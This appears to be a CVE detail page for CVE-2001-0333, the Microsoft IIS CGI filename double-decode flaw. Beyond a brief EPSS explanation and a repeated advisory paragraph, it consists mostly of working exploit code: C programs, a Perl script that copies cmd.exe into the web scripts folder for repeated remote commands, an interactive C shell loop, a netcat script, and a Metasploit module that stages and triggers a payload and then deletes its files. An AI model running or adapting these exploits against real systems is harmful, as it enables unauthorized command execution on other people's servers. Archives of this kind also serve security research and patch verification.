CVE-2001-0333 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

// source: https://www.securityfocus.com/bid/2708/info Due to a flaw in the handling of CGI filename program requests, remote users can execute arbitrary commands on an IIS host. When IIS receives a CGI filename request, it automatically performs two actions before completing the request: 1. IIS decodes the filename to determine the filetype and the legitimacy of the file. IIS then carries out a security check. 2. When the security check is completed, IIS decodes CGI parameters. A flaw in IIS involves a third undocumented action: Typically, IIS decodes only the CGI parameter at this point, yet the previously decoded CGI filename is mistakenly decoded twice. If a malformed filename is submitted and circumvents the initial security check, the undocumented procedure will decode the malformed request, possibly allowing the execution of arbitrary commands. Note that arbitrary commands will be run with the IUSR_machinename account privileges. Reportedly, various encoding combinations under Windows 2000 Server and Professional may yield different outcomes. Personal Web Server 1.0 and 3.0 are reported vulnerable to this issue. The worm Nimda(and variants) actively exploit this vulnerability. /* * * execiis.c - (c)copyright Filip Maertens * BUGTRAQ ID: 2708 - Microsoft IIS CGI Filename Decode Error * * DISCLAIMER: This is proof of concept code. This means, this code * may only be used on approved systems in order to test the availability * and integrity of machines during a legal penetration test. In no way * is the author of this exploit responsible for the use and result of * this code. * */ #include <stdio.h> #include <stdlib.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <unistd.h> #include <string.h> /* Modify this value to whichever sequence you want. * * %255c = %%35c = %%35%63 = %25%35%63 = / * */ #define SHOWSEQUENCE "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+" int main(int argc, char *argv[]) { struct sockaddr_in sin; char recvbuffer[1], stuff[200]; int create_socket; printf("iisexec.c | Microsoft IIS CGI Filename Decode Error | <[email protected]>\n-------------------------------------------------------------------------\n"); if (argc < 3) { printf(" -- Usage: iisexec [ip] [command]\n"); exit(0); } if (( create_socket = socket(AF_INET,SOCK_STREAM,0)) > 0 ) printf(" -- Socket created.\n"); sin.sin_family = AF_INET; sin.sin_port = htons(80); sin.sin_addr.s_addr = inet_addr(argv[1]); if (connect(create_socket, (struct sockaddr *)&sin,sizeof(sin))==0) printf(" -- Connection made.\n"); else { printf(" -- No connection.\n"); exit(1); } strcat(stuff, "GET "); strcat(stuff, SHOWSEQUENCE); strcat(stuff, argv[2]); strcat(stuff, " HTTP/1.0\n\n"); memset(recvbuffer, '\0',sizeof(recvbuffer)); send(create_socket, stuff, sizeof(stuff), 0); recv(create_socket, recvbuffer, sizeof (recvbuffer),0); if ( ( strstr(recvbuffer,"404") == NULL ) ) printf(" -- Command output:\n\n"); while(recv(create_socket, recvbuffer, 1, 0) > 0) { printf("%c", recvbuffer[0]); } else printf(" -- Wrong command processing. \n"); close(create_socket); }

// source: https://www.securityfocus.com/bid/2708/info Due to a flaw in the handling of CGI filename program requests, remote users can execute arbitrary commands on an IIS host. When IIS receives a CGI filename request, it automatically performs two actions before completing the request: 1. IIS decodes the filename to determine the filetype and the legitimacy of the file. IIS then carries out a security check. 2. When the security check is completed, IIS decodes CGI parameters. A flaw in IIS involves a third undocumented action: Typically, IIS decodes only the CGI parameter at this point, yet the previously decoded CGI filename is mistakenly decoded twice. If a malformed filename is submitted and circumvents the initial security check, the undocumented procedure will decode the malformed request, possibly allowing the execution of arbitrary commands. Note that arbitrary commands will be run with the IUSR_machinename account privileges. Reportedly, various encoding combinations under Windows 2000 Server and Professional may yield different outcomes. Personal Web Server 1.0 and 3.0 are reported vulnerable to this issue. The worm Nimda(and variants) actively exploit this vulnerability. /* IISEX by HuXfLuX <[email protected]>. IIS CGI File Decode Bug exploit. Written 16-05-2001. Compiles on Linux, works with IIS versions 3, 4 and 5. Microsoft's products were always famous for their backward compatibility! You can change the SHOWSEQUENCE value to some other strings that also work. More info: http://www.nsfocus.com Thanx to Filip Maertens <[email protected]> */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdarg.h> #include <unistd.h> #include <errno.h> #include <sys/socket.h> #include <sys/time.h> #include <netinet/in.h> #include <netdb.h> #include <arpa/inet.h> #define SHOWSEQUENCE "/scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+" int resolv(char *hostname,struct in_addr *addr); int main(int argc, char *argv[]) { struct sockaddr_in sin; struct in_addr victim; char recvbuffer[1], stuff[200]=""; int create_socket; printf("IISEX by HuxFlux <[email protected]>\nThis exploits the IIS CGI Filename Decode Error.\nWorks with IIS versions 3, 4 and 5!.\n"); if (argc < 3) { printf("[?] Usage: %s [ip] [command]\n", argv[0]); exit(0); } if (!resolv(argv[1],&victim)) { printf("[x] Error resolving host.\n"); exit(-1); } printf("\n[S] Exploit procedure beginning.\n"); if (( create_socket = socket(AF_INET,SOCK_STREAM,0)) > 0 ) printf("[*] Socket created.\n"); bzero(&sin,sizeof(sin)); memcpy(&sin.sin_addr,&victim,sizeof(struct in_addr)); sin.sin_family = AF_INET; sin.sin_port = htons(80); //sin.sin_addr.s_addr = inet_addr(argv[1]); if (connect(create_socket, (struct sockaddr *)&sin,sizeof(sin))==0) printf("[*] Connection made.\n"); else { printf("[x] No connection.\n"); exit(1); } strcat(stuff, "GET "); strcat(stuff, SHOWSEQUENCE); strcat(stuff, argv[2]); strcat(stuff, " HTTP/1.0\r\n\r\n"); printf("[*] Sending: %s", stuff); memset(recvbuffer, '\0',sizeof(recvbuffer)); send(create_socket, stuff, sizeof(stuff), 0); if ( strstr(recvbuffer,"404") == NULL ) { printf("[*] Command output:\n\n"); while(recv(create_socket, recvbuffer, 1, 0) > 0) { printf("%c", recvbuffer[0]); } printf("\n\n"); } else printf("[x] Wrong command processing. \n"); printf("[E] Finished.\n"); close(create_socket); } int resolv(char *hostname,struct in_addr *addr) { struct hostent *res; if (inet_aton(hostname,addr)) return(1); res = gethostbyname(hostname); if (res == NULL) return(0); memcpy((char *)addr,(char *)res->h_addr,sizeof(struct in_addr)); return(1); }

source: https://www.securityfocus.com/bid/2708/info Due to a flaw in the handling of CGI filename program requests, remote users can execute arbitrary commands on an IIS host. When IIS receives a CGI filename request, it automatically performs two actions before completing the request: 1. IIS decodes the filename to determine the filetype and the legitimacy of the file. IIS then carries out a security check. 2. When the security check is completed, IIS decodes CGI parameters. A flaw in IIS involves a third undocumented action: Typically, IIS decodes only the CGI parameter at this point, yet the previously decoded CGI filename is mistakenly decoded twice. If a malformed filename is submitted and circumvents the initial security check, the undocumented procedure will decode the malformed request, possibly allowing the execution of arbitrary commands. Note that arbitrary commands will be run with the IUSR_machinename account privileges. Reportedly, various encoding combinations under Windows 2000 Server and Professional may yield different outcomes. Personal Web Server 1.0 and 3.0 are reported vulnerable to this issue. The worm Nimda(and variants) actively exploit this vulnerability. #!/usr/bin/perl # Written by Cyrus The Gerat , [email protected] , May 15th 2001 # This perl script lets you to test the vulnerable servers to IIS4/5 CGI decode hole, # Also you can exploit the hole and execute your commands remotely! # Vulnerability found by NSfocus security team, # Tested for compatibility on UNIX/WINDOWS (activestate perl) # Works well on windows and unix platforms, $ARGC=@ARGV; if ($ARGC <3) { print "\n\nRemote IIS4/5 decode hole tester! By CyrusTheGreat ,CyrusArmy\@Bigfoot.com\n"; print "\n Usage:\n\n $0 <victim host> <victim port> <command line to execute>\n\n"; print " Victim Host: Address of IIS4/5 server vulnerable to decode hole! \n"; print " Victim port: HTTP/HTTPS port 80 or 443\n"; print " Command to Execute: for example \"echo Just hacked! > hacked.txt\" \n\n"; exit; } use Socket; my ($host,$port,$target,$notvulnerable,$notfound,$notcopied,$accessdenied); $host=$ARGV[0]; $port=$ARGV[1]; $target=inet_aton($host); $notvulnerable=1; $notfound=1; $accessdenied=0; print "\nRemote IIS4/5 decode hole tester! By CyrusTheGreat ,CyrusArmy\@Bigfoot.com\n"; print "Connecting to server $host port $port..., \n\n"; @results=sendraw("GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ver HTTP/1.0\r\n\r\n"); for ($i=0; $i <=7 ;$i++ ) { print $results[$i]; } foreach $line (@results){ if ($line =~ /\[Version/) { $notvulnerable=0; print "\nWow! system is vulnerable.\n"; print $line; } } if ($notvulnerable) { print "\nOops! System is not vulnerable. \n"; exit(1); } # you can exchange Wow! and Oops! as you prefer! ;-) print "\nChecking for command interpreter...\n"; @results=sendraw("GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir%20cyrus%2eexe HTTP/1.0\r\n\r\n"); #print @results; foreach $line (@results){ if ($line =~ /cyrus.exe/) {$notfound=0;} } if ($notfound) { print "Command interpreter not found, Trying to copy cmd.exe \n"; @results=sendraw("GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+%2e%2e%5c%2e%2e%5cwinnt%5csystem32%5ccmd%2eexe+cyrus%2eexe HTTP/1.0\r\n\r\n"); #print @results; } foreach $line (@results){ if (($line =~ /denied/ )) {$accessdenied=1;} } if ($accessdenied) { print"Cannot copy command interpreter, Try manually! \n\n"; exit(2); } else { print "Command interpreter OK \n"; } $command=@ARGV[2]; print "Now executing your command: $command \n\n"; #$command=~s/ /\%20/g; $command =~ s/(\W)/sprintf("%%%x", ord($1))/eg; #print $command; my @results=sendraw("GET /scripts/cyrus.exe?/c+$command HTTP/1.0\r\n\r\n"); print @results; print STDOUT "\n\nMore commands? , or EOF to end:\n"; while ($command = <STDIN>) { print "You said: $command \n"; chop $command; $command =~ s/(\W)/sprintf("%%%x", ord($1))/eg; my @results=sendraw("GET /scripts/cyrus.exe?/c+$command HTTP/1.0\r\n\r\n"); print @results; print "\n\nTell me more, or EOF (^D/^Z) to end:\n"; } print "\nThat's all! Another IIS hole just similified by cyrus!\n"; sub sendraw { my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,$port,$target)){ my @in; select(S); $|=1; print $pstr; while(<S>){ push @in, $_;} select(STDOUT); close(S); return @in; } else { print "Cannot connect to $host port $port\n"; exit(3); } }

// source: https://www.securityfocus.com/bid/2708/info Due to a flaw in the handling of CGI filename program requests, remote users can execute arbitrary commands on an IIS host. When IIS receives a CGI filename request, it automatically performs two actions before completing the request: 1. IIS decodes the filename to determine the filetype and the legitimacy of the file. IIS then carries out a security check. 2. When the security check is completed, IIS decodes CGI parameters. A flaw in IIS involves a third undocumented action: Typically, IIS decodes only the CGI parameter at this point, yet the previously decoded CGI filename is mistakenly decoded twice. If a malformed filename is submitted and circumvents the initial security check, the undocumented procedure will decode the malformed request, possibly allowing the execution of arbitrary commands. Note that arbitrary commands will be run with the IUSR_machinename account privileges. Reportedly, various encoding combinations under Windows 2000 Server and Professional may yield different outcomes. Personal Web Server 1.0 and 3.0 are reported vulnerable to this issue. The worm Nimda(and variants) actively exploit this vulnerability. /* lalaiis.c (or Microsoft IIS/PWS Escaped Characters Decoding Command Execution Vulnerability) Bugtraq id: 2708 It gives you a "shell-like" environment to test your IIS servers Coded by MovAX <[email protected]> Greetz to: lala, HeH! Magazine staff <http://www.dtmf.com.ar/digitalrebel> Fuckz to: Feel free to add your handle to this section. */ #include <stdio.h> #include <netdb.h> #include <stdlib.h> #include <string.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <arpa/inet.h> #include <signal.h> #include <errno.h> #include <fcntl.h> void usage(void) { fprintf(stderr, "\nusage: ./lalaiis website> vulnerable_directory"); fprintf(stderr, "\nwhere vulnerable_directory can be any 'scriptable' dir (like scripts msadc)"); fprintf(stderr, "\nex: ./lalaiis www.foo.bar scripts\n"); exit(-1); } int main(int argc, char **argv) { int i, le_socket, le_connect_error, le_timeout ; int timeout=80; int port=80; char temp[1]; char host[512]=""; char command[1024]=""; char request[8192]="GET /"; struct hostent *he; struct sockaddr_in s_addr; printf(":: lalaiis.c exploit. Coded by MovAX\n"); if (argc < 3) usage(); strncpy(host, argv[1], sizeof(host)); if(!strcmp(host, "")) { fprintf(stderr, "put a damn server\n"); usage(); } printf("\n:: Destination host > %s:%d\n", host, port); if((he=gethostbyname(host)) == NULL) { fprintf(stderr, "put a damn VALID server\n"); usage(); } for (;;) { command[0]=0; printf("\nlala_shell> "); if(fgets(command, sizeof(command), stdin) == NULL) perror("gets"); command[strlen(command)-1]='\0'; if(!strcmp("logout", command)) exit(-1); for(i=0;i<strlen(command);i++) {if(command[i]==' ') command[i]='+'; } strncpy(request, "GET /", sizeof(request)); strncat(request, argv[2], sizeof(request) - strlen(request)); strncat(request, "/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+", sizeof(request) - strlen(request)); strncat(request, command, sizeof(request) - strlen(request)); strncat(request, " HTTP/1.1\n", sizeof(request) - strlen(request)); strncat(request, "host:" ,sizeof(request) - strlen(request)); strncat(request, argv[1], sizeof(request) - strlen(request)); strncat(request, "\n\n", sizeof(request) - strlen(request)); s_addr.sin_family = AF_INET; s_addr.sin_port = htons(port); memcpy((char *) &s_addr.sin_addr, (char *) he->h_addr, sizeof(s_addr.sin_addr)); if((le_socket=socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { perror("socket\n"); exit(-1); } alarm(le_timeout); le_connect_error = connect(le_socket,(struct sockaddr *)&s_addr,sizeof(s_addr)); alarm(0); if(le_connect_error==-1) { perror("connect"); exit(-1); close(le_socket); } send(le_socket, request, strlen(request), 0); while(recv(le_socket,temp,1, 0)>0) { alarm(timeout); printf("%c", temp[0]); alarm(0); } } close(le_socket); return 0; }

source: https://www.securityfocus.com/bid/2708/info Due to a flaw in the handling of CGI filename program requests, remote users can execute arbitrary commands on an IIS host. When IIS receives a CGI filename request, it automatically performs two actions before completing the request: 1. IIS decodes the filename to determine the filetype and the legitimacy of the file. IIS then carries out a security check. 2. When the security check is completed, IIS decodes CGI parameters. A flaw in IIS involves a third undocumented action: Typically, IIS decodes only the CGI parameter at this point, yet the previously decoded CGI filename is mistakenly decoded twice. If a malformed filename is submitted and circumvents the initial security check, the undocumented procedure will decode the malformed request, possibly allowing the execution of arbitrary commands. Note that arbitrary commands will be run with the IUSR_machinename account privileges. Reportedly, various encoding combinations under Windows 2000 Server and Professional may yield different outcomes. Personal Web Server 1.0 and 3.0 are reported vulnerable to this issue. The worm Nimda(and variants) actively exploit this vulnerability. #!/bin/sh # Copyright 2001 by Leif Jakob <[email protected]> # # do not abuse this code... blah blah :) if [ -z "$1" ] ; then echo "usage:" echo "$0 hostname" exit 1 fi host="$1" NETCAT=`which netcat` if [ -z "$NETCAT" ] ; then NETCAT=`which nc` fi if [ -z "$NETCAT" -o ! -x "$NETCAT" ] ; then echo "you need netcat to make this work" exit 1 fi echo "using netcat:$NETCAT" function makeRequest { host="$1" count=$2 cmd="$3" echo -n 'GET /scripts/' while [ $count -gt 0 ] ; do echo -n '..%255c' count=$((count-1)) done echo -n 'winnt/system32/cmd.exe?/c+' echo -n "$cmd" echo ' HTTP/1.0' echo "Host: $host" echo '' echo 'dummy' } function testHost { host="$1" count=10 # you can't overdo it cmd='dir+c:\' makeRequest "$host" "$count" "$cmd" | netcat -w 4 $host 80 } testHost "$host"

source: https://www.securityfocus.com/bid/2708/info Due to a flaw in the handling of CGI filename program requests, remote users can execute arbitrary commands on an IIS host. When IIS receives a CGI filename request, it automatically performs two actions before completing the request: 1. IIS decodes the filename to determine the filetype and the legitimacy of the file. IIS then carries out a security check. 2. When the security check is completed, IIS decodes CGI parameters. A flaw in IIS involves a third undocumented action: Typically, IIS decodes only the CGI parameter at this point, yet the previously decoded CGI filename is mistakenly decoded twice. If a malformed filename is submitted and circumvents the initial security check, the undocumented procedure will decode the malformed request, possibly allowing the execution of arbitrary commands. Note that arbitrary commands will be run with the IUSR_machinename account privileges. Reportedly, various encoding combinations under Windows 2000 Server and Professional may yield different outcomes. Personal Web Server 1.0 and 3.0 are reported vulnerable to this issue. The worm Nimda(and variants) actively exploit this vulnerability. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20840.tgz

source: https://www.securityfocus.com/bid/2708/info Due to a flaw in the handling of CGI filename program requests, remote users can execute arbitrary commands on an IIS host. When IIS receives a CGI filename request, it automatically performs two actions before completing the request: 1. IIS decodes the filename to determine the filetype and the legitimacy of the file. IIS then carries out a security check. 2. When the security check is completed, IIS decodes CGI parameters. A flaw in IIS involves a third undocumented action: Typically, IIS decodes only the CGI parameter at this point, yet the previously decoded CGI filename is mistakenly decoded twice. If a malformed filename is submitted and circumvents the initial security check, the undocumented procedure will decode the malformed request, possibly allowing the execution of arbitrary commands. Note that arbitrary commands will be run with the IUSR_machinename account privileges. Reportedly, various encoding combinations under Windows 2000 Server and Professional may yield different outcomes. Personal Web Server 1.0 and 3.0 are reported vulnerable to this issue. The worm Nimda(and variants) actively exploit this vulnerability. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20841.zip

source: https://www.securityfocus.com/bid/2708/info Due to a flaw in the handling of CGI filename program requests, remote users can execute arbitrary commands on an IIS host. When IIS receives a CGI filename request, it automatically performs two actions before completing the request: 1. IIS decodes the filename to determine the filetype and the legitimacy of the file. IIS then carries out a security check. 2. When the security check is completed, IIS decodes CGI parameters. A flaw in IIS involves a third undocumented action: Typically, IIS decodes only the CGI parameter at this point, yet the previously decoded CGI filename is mistakenly decoded twice. If a malformed filename is submitted and circumvents the initial security check, the undocumented procedure will decode the malformed request, possibly allowing the execution of arbitrary commands. Note that arbitrary commands will be run with the IUSR_machinename account privileges. Reportedly, various encoding combinations under Windows 2000 Server and Professional may yield different outcomes. Personal Web Server 1.0 and 3.0 are reported vulnerable to this issue. The worm Nimda(and variants) actively exploit this vulnerability. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20842.tgz

## # $Id: ms01_026_dbldecode.rb 11513 2011-01-08 00:25:44Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' require 'rex/proto/tftp' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking # NOTE: This cannot be an HttpClient module since the response from the server # is not a valid HttpResponse include Msf::Exploit::Remote::Tcp include Msf::Exploit::CmdStagerTFTP def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft IIS/PWS CGI Filename Double Decode Command Execution', 'Description' => %q{ This module will execute an arbitrary payload on a Microsoft IIS installation that is vulnerable to the CGI double-decode vulnerability of 2001. NOTE: This module will leave a metasploit payload in the IIS scripts directory. }, 'Author' => [ 'jduck' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 11513 $', 'References' => [ [ 'CVE', '2001-0333' ], [ 'OSVDB', '556' ], [ 'BID', '2708' ], [ 'MSB', 'MS01-026' ], [ 'URL', 'http://marc.info/?l=bugtraq&m=98992056521300&w=2' ] ], 'Platform' => 'win', 'Targets' => [ [ 'Automatic', { } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'May 15 2001' )) register_options( [ Opt::RPORT(80), OptBool.new('VERBOSE', [ false, 'Enable verbose output', false ]), OptString.new('CMD', [ false, 'Execute this command instead of using command stager', nil ]) ], self.class) framework.events.add_exploit_subscriber(self) end def dotdotslash possibilities = [ "..%255c", "..%%35c", "..%%35%63", "..%25%35%63", ".%252e/", "%252e./", "%%32%65./", ".%%32%65/", ".%25%32%65/", "%25%32%65./" ] possibilities[rand(possibilities.length)] end def mini_http_request(opts, timeout=5) connect req = '' req << opts['method'] req << ' ' req << opts['uri'] req << ' ' req << "HTTP/1.0\r\n" req << "Host: #{datastore['RHOST']}\r\n" req << "\r\n" sock.put(req) # This isn't exactly awesome, but it seems to work.. begin headers = sock.get_once(-1, timeout) body = sock.get_once(-1, timeout) rescue ::EOFError # nothing end if (datastore['DEBUG']) print_status("Headers:\n" + headers.inspect) print_status("Body:\n" + body.inspect) end disconnect [headers, body] end def check res = execute_command("dir") if (res.kind_of?(Array)) body = res[1] if (body and body =~ /Directory of /) return Exploit::CheckCode::Vulnerable end end Exploit::CheckCode::Safe end # # NOTE: the command executes regardless of whether or not # a valid response is returned... # def execute_command(cmd, opts = {}) # Don't try the start command... # Using the "start" method doesn't seem to make iis very happy :( return [nil,nil] if cmd =~ /^start [a-zA-Z]+\.exe$/ print_status("Executing command: #{cmd}") uri = '/scripts/' exe = opts[:cgifname] if (not exe) uri << dotdotslash uri << dotdotslash uri << 'winnt/system32/cmd.exe' else uri << exe end uri << '?/x+/c+' uri << Rex::Text.uri_encode(cmd) if (datastore['VERBOSE']) print_status("Attemping to execute: #{uri}") end mini_http_request({ 'uri' => uri, 'method' => 'GET', }, 20) end def exploit # first copy the file exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe" print_status("Copying cmd.exe to the web root as \"#{exe_fname}\"...") # NOTE: this assumes %SystemRoot% on the same drive as the web scripts directory # However, it using %SystemRoot% doesn't seem to work :( res = execute_command("copy \\winnt\\system32\\cmd.exe #{exe_fname}") if (datastore['CMD']) res = execute_command(datastore['CMD'], { :cgifname => exe_fname }) if (res[0]) print_status("Command output:\n" + res[0]) else print_error("No output received") end res = execute_command("del #{exe_fname}") return end # Use the CMD stager to get a payload running execute_cmdstager({ :temp => '.', :linemax => 1400, :cgifname => exe_fname }) # Save these file names for later deletion @exe_cmd_copy = exe_fname @exe_payload = payload_exe # Just for good measure, we'll make a quick, direct request for the payload # Using the "start" method doesn't seem to make iis very happy :( print_status("Triggering the payload via a direct request...") mini_http_request({ 'uri' => '/scripts/' + payload_exe, 'method' => 'GET' }, 1) handler end # # The following handles deleting the copied cmd.exe and payload exe! # def on_new_session(client) if client.type != "meterpreter" print_error("NOTE: you must use a meterpreter payload in order to automatically cleanup.") print_error("The copied exe and the payload exe must be removed manually.") return end return if not @exe_cmd_copy # stdapi must be loaded before we can use fs.file client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") # Delete the copied CMD.exe print_status("Deleting copy of CMD.exe \"#{@exe_cmd_copy}\" ...") client.fs.file.rm(@exe_cmd_copy) # Migrate so that we can delete the payload exe client.console.run_single("run migrate -f") # Delete the payload exe return if not @exe_payload delete_me_too = "C:\\inetpub\\scripts\\" + @exe_payload print_status("Changing permissions on #{delete_me_too} ...") cmd = "C:\\winnt\\system32\\attrib.exe -r -h -s " + delete_me_too client.sys.process.execute(cmd, nil, {'Hidden' => true }) print_status("Deleting #{delete_me_too} ...") begin client.fs.file.rm(delete_me_too) rescue ::Exception => e print_error("Exception: #{e.inspect}") end end def cleanup framework.events.remove_exploit_subscriber(self) end end